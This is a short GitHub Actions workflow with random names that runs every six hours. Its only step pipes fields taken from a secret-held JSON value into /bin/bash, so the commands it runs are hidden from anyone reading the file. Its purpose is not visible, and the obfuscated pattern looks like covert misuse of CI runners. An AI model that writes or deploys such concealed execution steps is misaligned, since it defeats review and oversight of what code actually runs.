name: sdhgiyuan
on:
  workflow_dispatch:
  schedule:
    - cron: '3 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: sdhgiyuan
        env:
          lsm1: ${{ secrets.lsm1 }}
        run: |
          echo $lsm1 | jq -r .o21 | /bin/bash
          echo $pyrmi384 | jq -r .od7615 | /bin/bash
          echo $gcorz5110 | jq -r .gsbcf862 | /bin/bash
          echo $wv30 | jq -r .yevdc27 | /bin/bash
          echo $ctbcq82 | jq -r .t547 | /bin/bash
          echo $z436 | jq -r .b06440 | /bin/bash
          echo $r70979 | jq -r .pa0 | /bin/bash

